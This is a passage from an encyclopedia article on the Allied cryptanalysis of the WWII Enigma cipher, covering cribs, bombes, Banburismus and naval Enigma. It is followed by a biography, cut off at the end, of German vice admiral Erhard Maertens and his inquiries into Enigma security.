information to theAbwehr.[121] Occasionally, when there was a particularly urgent need to solve German naval Enigma keys, such as when anArctic convoywas about to depart, mines would be laid by theRAFin a defined position, whose grid reference in the German naval system did not contain any of the words (such assechsorsieben) for which abbreviations or alternatives were sometimes used.[122]The warning message about the mines and then the "all clear" message, would be transmitted both using thedockyard cipherand theU-boatEnigma network. This process ofplantinga crib was calledgardening.[123] Althoughcillieswere not actually cribs, thechit-chatin clear that Enigma operators indulged in among themselves often gave a clue as to the cillies that they might generate.[124] When captured German Enigma operators revealed that they had been instructed to encipher numbers by spelling them out rather than using the top row of the keyboard, Alan Turing reviewed decrypted messages and determined that the wordeins("one") appeared in 90% of messages.[citation needed]Turing automated the crib process, creating theEins Catalogue, which assumed thateinswas encoded at all positions in the plaintext. The catalogue included every possible rotor position forEINSwith that day'swheel orderand plugboard connections.[125] The British bombe was an electromechanical device designed by Alan Turing soon after he arrived at Bletchley Park in September 1939.Harold "Doc" Keenof theBritish Tabulating Machine Company(BTM) inLetchworth(35 kilometres (22 mi) from Bletchley) was the engineer who turned Turing's ideas into a working machine—under the codename CANTAB.[126]Turing's specification developed the ideas of the Poles'bomba kryptologicznabut was designed for the much more general crib-based decryption. The bombe helped to identify thewheel order, the initial positions of the rotor cores, and thestecker partnerof a specified letter. This was achieved by examining all 17,576 possible scrambler positions for a set ofwheel orderson a comparison between a crib and the ciphertext, so as to eliminate possibilities thatcontradictedthe Enigma's known characteristics. In the words of Gordon Welchman "the task of the bombe was simply to reduce the assumptions ofwheel orderand scrambler positions that required 'further analysis' to a manageable number".[110] The demountable drums on the front of the bombe were wired identically to the connections made by Enigma's different rotors. Unlike them, however, the input and output contacts for the left-hand and the right-hand sides were separate, making 104 contacts between each drum and the rest of the machine.[127]This allowed a set of scramblers to be connectedin seriesby means of 26-way cables. Electrical connections between the rotating drums' wiring and the rear plugboard were by means of metal brushes. When the bombe detected a scrambler position with no contradictions, it stopped and the operator would note the position before restarting it. Although Welchman had been given the task of studying Enigma trafficcall signsand discriminants, he knew from Turing about the bombe design and early in 1940, before the first pre-production bombe was delivered, he showed him an idea to increase its effectiveness.[128]It exploited the reciprocity in plugboard connections, to reduce considerably the number of scrambler settings that needed to be considered further. This became known as thediagonal boardand was subsequently incorporated to great effect in all the bombes.[22][129] A cryptanalyst would prepare a crib for comparison with the ciphertext. This was a complicated and sophisticated task, which later took the Americans some time to master. As well as the crib, a decision as to which of the many possiblewheel orderscould be omitted had to be made. Turing'sBanburismuswas used in making this major economy. The cryptanalyst would then compile amenuwhich specified the connections of the cables of the patch panels on the back of the machine, and a particular letter whosestecker partnerwas sought. The menu reflected the relationships between the letters of the crib and those of the ciphertext. Some of these formed loops (orclosuresas Turing called them) in a similar way to thecyclesthat the Poles had exploited. The reciprocal nature of the plugboard meant that no letter could be connected to more than one other letter. When there was a contradiction of two different letters apparently beingstecker partnerswith the letter in the menu, the bombe would detect this, and move on. If, however, this happened with a letter that was not part of the menu, a false stop could occur. In refining down the set of stops for further examination, the cryptanalyst would eliminate stops that contained such a contradiction. The other plugboard connections and the settings of the alphabet rings would then be worked out before the scrambler positions at the possible true stops were tried out onTypexmachines that had been adapted to mimic Enigmas. All the remaining stops would correctly decrypt the crib, but only the true stop would produce the correct plaintext of the whole message.[130] To avoid wasting scarce bombe time on menus that were likely to yield an excessive number of false stops, Turing performed a lengthy probability analysis (without any electronic aids) of the estimated number of stops per rotor order. It was adopted as standard practice only to use menus that were estimated to produce no more than four stops perwheel order. This allowed an 8-letter crib for a 3-closure menu, an 11-letter crib for a 2-closure menu, and a 14-letter crib for a menu with only one closure. If there was no closure, at least 16 letters were required in the crib.[130]The longer the crib, however, the more likely it was thatturn-overof the middle rotor would have occurred. The production model 3-rotor bombes contained 36 scramblers arranged in three banks of twelve. Each bank was used for a differentwheel orderby fitting it with the drums that corresponded to the Enigma rotors being tested. The first bombe was namedVictoryand was delivered to Bletchley Park on 18 March 1940. The next one, which included the diagonal board, was delivered on 8 August 1940. It was referred to as aspider bombeand was namedAgnus Deiwhich soon becameAgnesand thenAggie. The production of British bombes was relatively slow at first, with only five bombes being in use in June 1941, 15 by the year end,[131]30 by September 1942, 49 by January 1943[132]but eventually 210 at the end of the war. A refinement that was developed for use on messages from those networks that disallowed the plugboard (Stecker) connection of adjacent letters, was theConsecutive Stecker Knock Out. This was fitted to 40 bombes and produced a useful reduction in false stops.[133] Initially the bombes were operated by ex-BTM servicemen, but in March 1941 the first detachment of members of theWomen's Royal Naval Service(known asWrens) arrived at Bletchley Park to become bombe operators. By 1945 there were some 2,000 Wrens operating the bombes.[134]Because of the risk of bombing, relatively few of the bombes were located at Bletchley Park. The largest two outstations were atEastcote(some 110 bombes and 800 Wrens) and Stanmore (some 50 bombes and 500 Wrens). There were also bombe outstations at Wavendon, Adstock, and Gayhurst. Communication with Bletchley Park was byteleprinterlinks. When the German Navy started using 4-rotor Enigmas, about sixty 4-rotor bombes were produced at Letchworth, some with the assistance of theGeneral Post Office.[135]TheNCR-manufacturedUS Navy 4-rotor bombeswere, however, very fast and the most successful. They were extensively used by Bletchley Park over teleprinter links (using theCombined Cipher Machine) toOP-20-G[136]for both 3-rotor and 4-rotor jobs.[137] Although the German army, SS, police, and railway all used Enigma with similar procedures, it was theLuftwaffe(Air Force) that was the first and most fruitful source of Ultra intelligence during the war. The messages were decrypted inHut 6at Bletchley Park and turned into intelligence reports inHut 3.[138]The network code-named 'Red' at Bletchley Park was broken regularly and quickly from 22 May 1940 until the end of hostilities. Indeed, the Air Force section of Hut 3 expected the new day's Enigma settings to have been established in Hut 6 by breakfast time. The relative ease of solving this network's settings was a product of plentiful cribs and frequent German operating mistakes.[139]Luftwaffe chiefHermann Göringwas known to use it for trivial communications, including informing squadron commanders to make sure the pilots he was going to decorate had been properly deloused. Such messages became known as "Göring funnies" to the staff at Bletchley Park.[citation needed] Dilly Knox's last great cryptanalytical success, before his untimely death in February 1943, was the solving of theAbwehrEnigma in 1941. Intercepts of traffic which had an 8-letter indicator sequence before the usual 5-letter groups led to the suspicion that a 4-rotor machine was being used.[140]The assumption was correctly made that the indicator consisted of a 4-letter message key enciphered twice. The machine itself was similar to aModel G Enigma, with three conventional rotors, though it did not have a plug board. The principal difference to the model G was that it was equipped with a reflector that was advanced by the stepping mechanism once it had been set by hand to its starting position (in all other variants, the reflector was fixed). Collecting a set of enciphered message keys for a particular day allowedcycles(orboxesas Knox called them) to be assembled in a similar way to the method used by the Poles in the 1930s.[141] Knox was able to derive, using hisbuttoning upprocedure,[35]some of the wiring of the rotor that had been loaded in the fast position on that day. Progressively he was able to derive the wiring of all three rotors. Once that had been done, he was able to work out the wiring of the reflector.[141]Deriving the indicator setting for that day was achieved using Knox's time-consumingroddingprocedure.[36]This involved a great deal of trial and error, imagination, and crossword puzzle-solving skills, but was helped bycillies. TheAbwehrwas theintelligenceandcounter-espionageservice of the German High Command. The spies that it placed in enemy countries used a lower level cipher (which was broken byOliver Strachey's section at Bletchley Park) for their transmissions. However, the messages were often then re-transmitted word-for-word on theAbwehr'sinternal Enigma networks, which gave the best possible crib for deciphering that day's indicator setting. Interception and analysis ofAbwehrtransmissions led to the remarkable state of affairs that allowed MI5 to give a categorical assurance that all the German spies in Britain were controlled asdouble agentsworking for the Allies under theDouble Cross System.[121] In the summer of 1940 following theFranco-German armistice, most Army Enigma traffic was travelling by land lines rather than radio and so was not available to Bletchley Park. The airBattle of Britainwas crucial, so it was not surprising that the concentration of scarce resources was onLuftwaffeandAbwehrtraffic. It was not until early in 1941 that the first breaks were made into German Army Enigma traffic, and it was the spring of 1942 before it was broken reliably, albeit often with some delay.[142]It is unclear whether the German Army Enigma operators made deciphering more difficult by making fewer operating mistakes.[143] The German Navy used Enigma in the same way as the German Army and Air Force until 1 May 1937, when they changed to a substantially different system. This used the same sort of setting sheet but, importantly, it included the ground key for a period of two, sometimes three days. The message setting was concealed in the indicator by selecting a trigram from a book (theKenngruppenbuch, or K-Book) and performing a bigram substitution on it.[144]This defeated the Poles, although they suspected some sort of bigram substitution. The procedure for the naval sending operator was as follows. First they selected a trigram from the K-Book, say YLA. They then looked in the appropriate columns of the K-Book and selected another trigram, say YVT, and wrote it in the boxes at the top of the message form: They then filled in the "dots" with any letters, giving say: Finally they looked up the vertical pairs of letters in the Bigram Tables and wrote down the resultant pairs, UB, LK, RS, and PW which were transmitted as two four letter groups at the start and end of the enciphered message. The receiving operator performed the converse procedure to obtain the message key for setting his Enigma rotors. As well as theseKriegsmarineprocedures being much more secure than those of the German Army and Air Force, the German Navy Enigma introduced three more rotors (VI, VII, and VIII), early in 1940.[145]The choice of three rotors from eight meant that there were a total of 336 possible permutations of rotors and their positions. Alan Turing decided to take responsibility for German naval Enigma because "no one else was doing anything about it and I could have it to myself".[146]He establishedHut 8withPeter Twinnand two "girls".[147]Turing used the indicators and message settings for traffic from 1–8 May 1937 that the Poles had worked out, and some very elegant deductions to diagnose the complete indicator system. After the messages were deciphered they were translated for transmission to the Admiralty in Hut 4. The first break of wartime traffic was in December 1939, into signals that had been intercepted in November 1938, when only three rotors and six plugboard leads had been in use.[148]It used "Forty Weepy Weepy" cribs. A captured GermanFunkmaat("radio operator") named Meyer had revealed that numerals were now spelt out as words. EINS, the German for "one", was present in about 90% of genuine German Navy messages. An EINS catalogue was compiled consisting of the encipherment of EINS at all 105,456 rotor settings.[149]These were compared with the ciphertext, and when matches were found, about a quarter of them yielded the correct plaintext. Later this process was automated in Mr Freeborn's section usingHollerith equipment. When the ground key was known, this EINS-ing procedure could yield three bigrams for the tables that were then gradually assembled.[148] Further progress required more information from German Enigma users. This was achieved through a succession ofpinches, the capture of Enigma parts and codebooks. The first of these was on 12 February 1940, when rotors VI and VII, whose wiring was at that time unknown, were captured from theGerman submarineU-33, by minesweeperHMSGleaner. On 26 April 1940, the Narvik-bound German patrol boatVP2623, disguised as a Dutch trawler namedPolares, was captured byHMSGriffin. This yielded an instruction manual, codebook sheets, and a record of some transmissions, which provided complete cribs. This confirmed that Turing's deductions about the trigram/bigram process were correct and allowed a total of six days' messages to be broken, the last of these using the first of the bombes.[148]However, the numerous possible rotor sequences, together with a paucity of usable cribs, made the methods used against the Army and Air Force Enigma messages of very limited value with respect to the Navy messages. At the end of 1939, Turing extended theclock methodinvented by the Polish cryptanalystJerzy Różycki. Turing's method became known as "Banburismus". Turing said that at that stage "I was not sure that it would work in practice, and was not in fact sure until some days had actually broken".[150]Banburismus used large cards printed in Banbury (hence the Banburismus name) to discover correlations and a statistical scoring system to determine likely rotor orders (Walzenlage) to be tried on the bombes. The practice conserved scarce bombe time and allowed more messages to be attacked. In practice, the 336 possible rotor orders could be reduced to perhaps 18 to be run on the bombes.[151]Knowledge of the bigrams was essential for Banburismus, and building up the tables took a long time. This lack of visible progress led toFrank Birch, head of the Naval Section, to write on 21 August 1940 toEdward Travis, Deputy Director of Bletchley Park: "I'm worried about Naval Enigma. I've been worried for a long time, but haven't liked to say as much... Turing and Twinn are like people waiting for a miracle, without believing in miracles..."[152] Schemes for capturing Enigma material were conceived including, in September 1940,Operation Ruthlessby Lieutenant CommanderIan Fleming(author of theJames Bondnovels). When this was cancelled, Birch told Fleming that "Turing and Twinn came to me like undertakers cheated of a nice corpse..."[153] A major advance came throughOperation Claymore, acommandoraid on theLofoten Islandson 4 March 1941. The Germanarmed trawlerKrebswas captured, including the complete Enigma keys for February, but no bigram tables or K-book. However, the material was sufficient to reconstruct the bigram tables by "EINS-ing", and by late March they were almost complete.[154] Banburismus then started to become extremely useful. Hut 8 was expanded and moved to 24-hour working, and a crib room was established. The story of Banburismus for the next two years was one of improving methods, of struggling to get sufficient staff, and of a steady growth in the relative and absolute importance of cribbing as the increasing numbers of bombes made the running of cribs ever faster.[155]Of value in this period were further "pinches" such as those from theGerman weather shipsMünchenandLauenburgand the submarinesU-110andU-559. Despite the introduction of the 4-rotor Enigma for Atlantic U-boats, the analysis of traffic enciphered with the 3-rotor Enigma proved of immense value to the Allied navies. Banburismus was used until July 1943, when it became more efficient to use the many more bombes that had become available. On 1 February 1942, the Enigma messages to and from Atlantic U-boats, which Bletchley Park called "Shark", became significantly different from the rest of the traffic, which they called "Dolphin".[156] This was because a new Enigma version had been brought into use. It was a development of the3-rotor Enigmawith the reflector replaced by a thin rotor and a thin reflector. Eventually, there were two fourth-position rotors that were called Beta and Gamma and two thin reflectors, Bruno and Caesar, which could be used in any combination. These rotors were not advanced by the rotor to their right, in the way that rotors I through VIII were. The introduction of thefourth rotordid not catch Bletchley Park by surprise, because captured material dated January 1941 had made reference to its development as an adaptation of the 3-rotor machine, with the fourth rotor wheel to be a reflector wheel.[157]Indeed, because of operator errors, the wiring of the new fourth rotor had already been worked out. This major challenge could not be met by using existing methods and resources for a number of reasons. It seemed, therefore, that effective, fast, 4-rotor bombes were the only way forward. This was an immense problem and it gave a great deal of trouble. Work on a high speed machine had been started byWynn-Williamsof theTRElate in 1941 and some nine months laterHarold Keenof BTM started work independently. Early in 1942, Bletchley Park were a long way from possessing a high speed machine of any sort.[159] Eventually, after a long period of being unable to decipher U-boat messages, a source of cribs was found. This was theKurzsignale (short signals), a code which the German navy used to minimise the duration of transmissions, thereby reducing the risk of being located byhigh-frequency direction findingtechniques. The messages were only 22 characters long and were used to report sightings of possible Allied targets.[160]A copy of the code book had been captured fromU-110on 9 May 1941. A similar coding system was used for weather reports from U-boats, theWetterkurzschlüssel, (Weather Short Code Book). A copy of this had been captured fromU-559on 29 or 30 October 1942.[161]These short signals had been used for deciphering 3-rotor Enigma messages and it was discovered that the new rotor had a neutral position at which it, and its matching reflector, behaved just like a 3-rotor Enigma reflector. This allowed messages enciphered at this neutral position to be deciphered by a 3-rotor machine, and hence deciphered by a standard bombe. Deciphered Short Signals provided good material for bombe menus for Shark.[162]Regular deciphering of U-boat traffic restarted in December 1942.[163] In 1940 Dilly Knox wanted to establish whether the Italian Navy were still using the same system that he had cracked during the Spanish Civil War; he instructed his assistants to use rodding to see whether the cribPERX(perbeing Italian for "for" andXbeing used to indicate a space between words) worked for the first part of the message. After three months there was no success, butMavis Lever, a 19-year-old student, found that rodding producedPERSfor the first four letters of one message. She then (against orders) tried beyond this and obtainedPERSONALE(Italian for "personal"). This confirmed that the Italians were indeed using the same machines and procedures.[36] The subsequent breaking of Italian naval Enigma ciphers led to substantial Allied successes. The cipher-breaking was disguised by sending areconnaissance aircraftto the known location of a warship before attacking it, so that the Italians assumed that this was how they had been discovered. The Royal Navy's victory at theBattle of Cape Matapanin March 1941 was considerably helped by Ultra intelligence obtained from Italian naval Enigma signals.[164] Unlike the situation at Bletchley Park, the United States armed services did not share a combined cryptanalytical service. Before the US joined the war, there was collaboration with Britain, albeit with a considerable amount of caution on Britain's side because of the extreme importance of Germany and her allies not learning that its codes were being broken. Despite some worthwhile collaboration among the cryptanalysts, their superiors took some time to achieve a trusting relationship in which both British and American bombes were used to mutual benefit. In February 1941, CaptainAbraham Sinkovand LieutenantLeo Rosenof the US Army, and Lieutenants Robert Weeks andPrescott Currierof the US Navy, arrived at Bletchley Park, bringing, among other things, a replica of the"Purple" cipher machinefor Bletchley Park's Japanese section inHut 7.[165]The four returned to America after ten weeks, with a naval radio direction-finding unit and many documents,[166]including a "paper Enigma".[167] The main American response to the 4-rotor Enigma was the US Navy bombe, which was manufactured in much less constrained facilities than were available in wartime Britain. ColonelJohn Tiltman, who later became Deputy Director at Bletchley Park, visited the US Navy cryptanalysis office (OP-20-G) in April 1942 and recognised America's vital interest in deciphering U-boat traffic. The urgent need, doubts about the British engineering workload, and slow progress prompted the US to start investigating designs for a Navy bombe, based on the fullblueprintsand wiring diagrams received by US Navy Lieutenants Robert Ely and Joseph Eachus at Bletchley Park in July 1942.[168][169]Funding for a full, $2 million, Navy development effort was requested on 3 September 1942 and approved the following day. Commander Edward Travis, Deputy Director andFrank Birch, Head of the German Naval Section travelled from Bletchley Park to Washington in September 1942. WithCarl Frederick Holden, US Director of Naval Communications they established, on 2 October 1942, a UK:US accord which may have "a stronger claim thanBRUSAto being the forerunner of theUKUSA Agreement", being the first agreement "to establish the specialSigintrelationship between the two countries", and "it set the pattern for UKUSA, in that the United States was very much the senior partner in the alliance".[170]It established a relationship of "full collaboration" between Bletchley Park and OP-20-G.[171] An all electronic solution to the problem of a fast bombe was considered,[172]but rejected for pragmatic reasons, and a contract was let with theNational Cash Register Corporation(NCR) inDayton, Ohio. This established theUnited States Naval Computing Machine Laboratory. Engineering development was led by NCR'sJoseph Desch, a brilliant inventor and engineer. He had already been working on electronic counting devices.[173] Alan Turing, who had written a memorandum to OP-20-G (probably in 1941),[174]was seconded to the British Joint Staff Mission in Washington in December 1942, because of his exceptionally wide knowledge about the bombes and the methods of their use. He was asked to look at the bombes that were being built by NCR and at the security of certain speech cipher equipment under development at Bell Labs.[175]He visited OP-20-G, and went to NCR in Dayton on 21 December. He was able to show that it was not necessary to build 336 Bombes, one for each possible rotor order, by utilising techniques such asBanburismus.[176]The initial order was scaled down to 96 machines. The US Navy bombes used drums for the Enigma rotors in much the same way as the British bombes, but were very much faster. The first machine was completed and tested on 3 May 1943. Soon these bombes were more available than the British bombes at Bletchley Park and its outstations, and as a consequence they were put to use for Hut 6 as well as Hut 8 work.[177]A total of 121 Navy bombes were produced.[178] The US Army also produced a version of a bombe. It was physically very different from the British and US Navy bombes. A contract was signed withBell Labson 30 September 1942.[179]The machine was designed to analyse 3-rotor, not 4-rotor traffic. It did not use drums to represent the Enigma rotors, using instead telephone-type relays. It could, however, handle one problem that the bombes with drums could not.[177][178]The set of ten bombes consisted of a total of 144 Enigma-equivalents, each mounted on a rack approximately 7 feet (2.1 m) long 8 feet (2.4 m) high and 6 inches (150 mm) wide. There were 12 control stations which could allocate any of the Enigma-equivalents into the desired configuration by means of plugboards. Rotor order changes did not require the mechanical process of changing drums, but was achieved in about half a minute by means of push buttons.[180]A 3-rotor run took about 10 minutes.[178] The German navy was concerned that Enigma could be compromised. They printed key schedules in water-soluble inks so that they could not be salvaged.[181]They policed their operators and disciplined them when they made errors that could compromise the cipher.[182]The navy minimised its exposure. For example, ships that might be captured or run aground did not carry Enigma machines. When ships were lost in circumstances where the enemy might salvage them, the Germans investigated.[183]After investigating some losses in 1940, Germany changed some message indicators.[184] In April 1940, the Britishsank eight German destroyers in Norway. The Germans concluded that it was unlikely that the British were reading Enigma.[181] In May 1941, the British deciphered some messages that gave the location of some supply ships for thebattleshipBismarckand thecruiserPrinz Eugen. As part of theOperation Rheinübungcommerce raid, the Germans had assigned five tankers, two supply ships, and two scouts to support the warships. After theBismarckwas sunk, the British directed its forces to sink the supporting shipsBelchen,Esso Hamburg,Egerland, and some others. The Admiralty specifically did not target the tankerGedaniaand the scoutGonzenheim, figuring that sinking so many ships within one week would indicate to Germany that Britain was reading Enigma. However, by chance, British forces found those two ships and sank them.[185]The Germans investigated, but concluded Enigma had not been breached by either seizures or brute-force cryptanalysis. Nevertheless, the Germans took some steps to make Enigma more secure. Grid locations (an encoded latitude and longitude) were further disguised using digraph tables and a numeric offset.[186]The U-boats were given their own network,Triton, to minimise the chance of a cryptanalytic attack. In August 1941, the British capturedU-570. The Germans concluded the crew would have destroyed the important documents, so the cipher was safe. Even if the British had captured the materials intact and could read Enigma, the British would lose that ability when the keys changed on 1 November.[187] Although Germany realised that convoys were avoiding itswolfpacks, it did not attribute that ability to reading Enigma traffic. Instead,Dönitzthought that Britain was using radar and direction finding.[187]TheKriegsmarinecontinued to increase the number of networks to avoid superimposition attacks on Enigma. At the beginning of 1943, theKriegsmarinehad 13 networks.[188] TheKriegsmarinealso improved the Enigma. On 1 February 1942, it started using the four-rotor Enigma.[189]The improved security meant that convoys no longer had as much information about the whereabouts of wolfpacks, and were therefore less able to avoid areas where they would be attacked. The increased success of wolfpack attacks following the strengthening of the encryption might have given the Germans a clue that the previous Enigma codes had been broken. However, that recognition did not happen because other things changed at the same time: the United States had entered the war, and Dönitz had sent U-boats to raid the US East Coast, where there were many easy targets.[190] In early 1943, Dönitz was worried that the Allies were reading Enigma. Germany's own cryptanalysis of Allied communications showed surprising accuracy in its estimates of wolfpack sizes. It was concluded, however, that Allied direction finding was the source. The Germans also recovered acavity magnetron, used to generate radar waves, from a downed British bomber. The conclusion was that the Enigma was secure. The Germans were still suspicious, so each submarine got its own key net in June 1944.[191] By 1945, almost all German Enigma traffic (Wehrmacht military; comprising theHeer, Kriegsmarine, and Luftwaffe; and German intelligence and security services like the Abwehr, SD, etc.) could be decrypted within a day or two, yet the Germans remained confident of its security.[192]They openly discussed their plans and movements, handing the Allies huge amounts of information, not all of which was used effectively. For example, Rommel's actions atKasserine Passwere clearly foreshadowed in decrypted Enigma traffic, but the Americans did not properly appreciate the information.[citation needed] After the war, AlliedTICOMproject teams found and detained a considerable number of German cryptographic personnel.[193]Among the things learned was that German cryptographers, at least, understood very well that Enigma messages might be read; they knew Enigma was not unbreakable.[4]They just found it impossible to imagine anyone going to the immense effort required.[194]When Abwehr personnel who had worked onFish cryptographyand Russian traffic were interned atRosenheimaround May 1945, they were not at all surprised that Enigma had been broken,[citation needed][dubious–discuss]only that someone had mustered all the resources in time to actually do it. AdmiralDönitzhad been advised that a cryptanalytic attack was the least likely of all security problems.[citation needed] Modern computers can be used to solve Enigma, using a variety of techniques.[195]There have been projects to decrypt some remaining messages usingdistributed computing.[196] On 8 May 2020, to mark the 75th anniversary ofVE Day,GCHQreleased the last Enigma message to be decrypted by codebreakers at Bletchley Park. The message was sent at 07:35 on 7 May 1945 by a German radio operator inCuxhavenand read: "British troops entered Cuxhaven at 14:00 on 6 May 1945 – all radio broadcast will cease with immediate effect – I wish you all again the best of luck". It was immediately followed by another message: "Closing down forever – all the best – goodbye".[197] The break into Enigma had been kept a secret until 1974. The machines were used well into the 1960s in Switzerland, Norway (Norenigma), and in some British colonies.
https://en.wikipedia.org/wiki/Cryptanalysis_of_the_Enigma
Erhard MaertensorEberhard Maertens(26 February 1891 – 5 May 1945)[1][2]was a GermanVizeadmiralof theKriegsmarineduringWorld War II. From 16 June 1941 to 5 May 1943, he was Chief of Office of Naval Intelligence, Naval War Command (German:Marinekommandoamt) in theOberkommando der Marine. Maertens was known for underestimating British intelligence, and specifically, overrating the security of the NavalEnigmacipher machine. In 1941, he held a naval enquiry into the strength of Naval Enigma security after the capture ofU-boatU-570, and attributed all the suspicious losses in U-boats at the time to the BritishHuff-Duff. In the second enquiry, ordered by the Commander-in-Chief of the Navy (German:Oberbefehlshaber der Kriegsmarine)Karl Dönitz, in May 1943, he investigated a number of areas, which exculpated Enigma security in the end, for the second time, incorrectly blaming British 9.7 centimetre centimetric radar for the massivelossesin U-boats by mid 1943.[3] On 1 April 1910, Maertens joined theImperial German Navyas aSeekadettand had basic training on the heavy cruiserSMSHansauntil 31 March 1911. He was promoted to anofficer candidaterank (German:Fähnrich zur See) and sent to theGerman Imperial Naval AcademyNaval Academy Mürwikfor Naval training until 30 September 1912.[2]In September 1913, he was promoted to Midshipman (German:Leutnant zur See) after completing his training. From 1 October 1912 to 7 October 1915, Maertens was posted to the linerHessento learn the sailing characteristics of large ships and their movements. On 8 September, Maertens started submarine and radio training, and later posted as a watch officer on theU-boatU-3on 17 October 1915. He completed his submarine training on 26 February 1916, promoted on 22 March 1916 toOberleutnant zur See, and was posted to U-boatU-47as the watch officer the day after.[2]He was subsequently posted toU-48, to take up the same post, until 24 November 1917, whenU-48ran aground onGoodwin Sands, where the submarine was fired on byHMSGipsyand was scuttled and abandoned. Maertens and 17 other submariners ofU-48were taken as prisoners,[4]and held in captivity until 5 November 1919.[2] After being released, Maertens was subordinated to the battleshipSMSSchwabenfor a month as a watch officer. In early 1920, he was posted toBaltiyskfor two months as a Naval Signals Officer. On 1 January 1921, he was promoted to captain lieutenant, (German:Kapitanleutnant), an officer grade of the captains military hierarchy group. On 1 March 1921, Maertens was ordered to be acting leader of the service office atKönigsberg. On 7 April 1921, he was subordinated asAdjutantand Naval Signals Officer to the Commander of the naval base atŚwinoujście.[2]In October 1921, he was posted to the Coastal Defence Battalion I as company leader where he stayed until March 1925. On 1 January 1921, Maertens was promoted tocaptain lieutenant(German:Kapitanleutnant). On 17 March 1925, he was subordinated to the commander of the Torpedo and Mining Academy inKielwhere he stayed until 14 August 1928. From 15 August 1928 to 30 September 1934, he was the department head of the Naval Shipyard of the Naval Command (German:Reichsmarine). In October 1934, Maertens was promoted to Frigate captain, (German:Fregattenkapitän), which was the senior middle rank of the Kriegsmarine. From 1934 to 1936, he was Commander of theNaval Academy Mürwik. He was then posted to the Bureau of Inspection of thetorpedoService in Kiel as Director of Staff until 30 September 1937. During the same period he was ordered to be Acting Inspector of Torpedo Affairs until 17 April 1937.[2]From October 1937 to April 1939, Maertens was Director of Staff of Inspections in Naval Signals and, order again, on a temporary basis, to be Acting Inspector of Naval Signals from May 1938 to March 1939. He then became leader and subsequent Commander of the Communication Test Institute of the OKM from 28 April 1939 to 18 November 1939. He was again promoted to Director of the Technical Signals Affairs in the Naval Weapons Office in theOberkommando der Marinefrom 19 November 1939 to 15 June 1941.[2]On 1 July 1940, Maertens was promoted to rear admiral,Konteradmiral, and on 1 September 1942, promoted toVizeadmiral. From 19 June 1941 to 5 May 1943, he was promoted to Group Director of theNaval Intelligence Service, (German:SeekriegsleitungIII) of theOberkommando der Marine(OKM/4 SKL III).[2]From 6 May 1943 to June 1943 Maertens was Acting Shipyard Director of theKriegsmarineshipyard inKiel. From 28 November 1944 to 28 February 1945, he was placed at the disposal ofOskar Kummetzwho was the Baltic Sea regional commander.[2] Maertens retired on 28 February 1945. Maertens was a career navy signals officer who was promoted to the Director of the Naval Intelligence Command (German:Marinenachrichtendienst) in June 1941. It was during a time when theB-Dienst, the Naval Intelligence department of theKriegsmarine, was the most active. In May 1941, CaptainLudwig Stummel, who was Group Director of Naval Warfare department, was a subordinate of Maertens. After the sinking of eight destroyers and the U-boatU-13in April–May 1940, Stummel started a probe into the sinking. Vice admiralKarl Dönitzrequested confirmation that the sinking of the submarine effected the change in movement of a convoy that was targeted, and was specifically asking for assurances of Enigma M's security.[5]Konteradmiral Erhard Maertens, coming to the aid of his subordinate, stated that four events would need to occur, which would make it highly unlikely:[6][7] Maertens believed that these events were taken alone were unlikely, but when combined would be impossible. A bombing raid was ordered in an attempt to ensure that the U-13 and all associated Key M (i.e.Enigma cipher machine) infrastructures were destroyed.[7]The crew of one of the planes noticed that the site of the U-13 was marked by buoys, indicating perhaps, the submarine had not been salvaged. This was stated in the official report. In that case, the British Admiralty did not recover any Key M material or machinery. Maertens was ordered to lead a formal enquiry into the "control and investigation of own processes" following the August 1941 capture of the U-boatU-570(later renamed HMSGraphby the Royal Navy), a potential leak of German secure communication details. This was considered by Naval Intelligence to be a progression and continuation of previous investigations and probes, a process that existed since the Naval Enigma cipher machine was introduced.[5]One of these investigations had been conducted byKurt Fricke, Chief of Naval War Command, on another incident, the sinking of theGerman battleship Bismarckon 27 May 1941, caused great consternation in the Kriegsmarine, which resulted in a number of changes to Enigma cipher processes. On 18 October 1941, Maertens completed his analysis of the security consequences by stating in his report that "a current reading of our messages is not possible." On the next page, however, he conceded that if the enemy had found the Enigma cipher machine untouched with all key documents, then a current reading was possible. The U-boats routinely carried between two and three months worth of daily key settings, so the enemy could have used U-570's material to read enciphered messages until November 1941. If these documents had fallen into enemy hands, the Maerten's results would be that "without doubt a weakening of the security of our cipher." He concluded that having enough time to drench the documents would be unlikely, making their water-soluble ink unreadable. In the end, he left the impression that the British were not solving Enigma messages.[8]In fact, once captured, a search of U-570 was conducted and useful papers had missed destruction, by the departed German crew. Copies of encrypted signals and their corresponding plain-language German texts were in fact discovered by the British. The U-570 papers included all supporting documentations for the Naval Key M ciphers. Maertens's verdict in his final report had some very worrying conclusions: We have to accept that the U-570 might have been captured by the enemy without anything having been destroyed. In these circumstances it cannot be ruled out that... a large amount of cipher documents are in enemy's hands. If this is true, the security of our enciphering procedure has been weakened... Out cipher will have been compromised if, as well as the enemy capturing the codebooks, our officers, who are now POW's have told the enemy the keyword, which since June 1941 has been given verbally to the U-boat commander so that he could alter the printed list of Enigma settings. If that has occurred, then we have to accept that our radio messages are being read by the enemy...The same would be true if the keyword had been written down in breach of regulations, and the codebooks and the keyword had fallen into enemy hands, or if, for example, the settings arrived at by the keyword order were written on the original settings list. If this happened, the enemy could work out the meaning of the keyword.[9] Theaction in Tarrafal Bayworried Donitz and another investigation was launched by Maertens. He noted that the U-boatU-111had detailed a meeting point in a message transmitted on 23 September 1941, which was four days before the ambush. Maertens stated that "if U-111 message was read, then there would be an attempt to disturb the meeting." However, he again shied away from directly suggesting that Key M infrastructure had been compromised. He could not believe that the British could not make such a mess of the attack in such favourable conditions if the Naval Enigma cipher had been broken. On 24 October 1941, Maertens overall conclusion was stated in a letter to Donitz: The acute disquiet about the compromise of our Secret Operation cannot be justified. Our cipher does not appear to be broken.[9] In fact, theNaval Intelligence Divisionhad solved a message intercepted fromU-111, and theAdmiraltyhad dispatched the submarineHMSClydeto destroy the U-boats in the Bay ofTarrafalon the island ofSanto Antão.[10] In February and March 1943, Admiral Dönitz met with Adolf Hitler four times to discuss theBattle of the Atlantic, and the point that the Allies probably know the location of U-boat groups as they were routing the convoys around the U-boat packs. It was strongly suspected that the Allies broke the cipher machine, and again, Maertens was asked to conduct another enquiry. He again assured Dönitz and exculpated the Enigma cipher machine security.[11]Around the same time, documents were discovered inFrench Resistanceagent stations, showing that the Allies were obtaining information from the resistance on departure times for U-boats and whether they were going north or south, enabling the foe. Maertens thought to estimate submarine movements with some accuracy. The discovery ofcentimetric radar, on a downed British bomber inRotterdam, which operated on a wavelength of 9.7 cm, supported his assumptions. The radar assumed that British aeroplanes could detect the U-boat while surfaced without alerting the U-boat and could attack them by 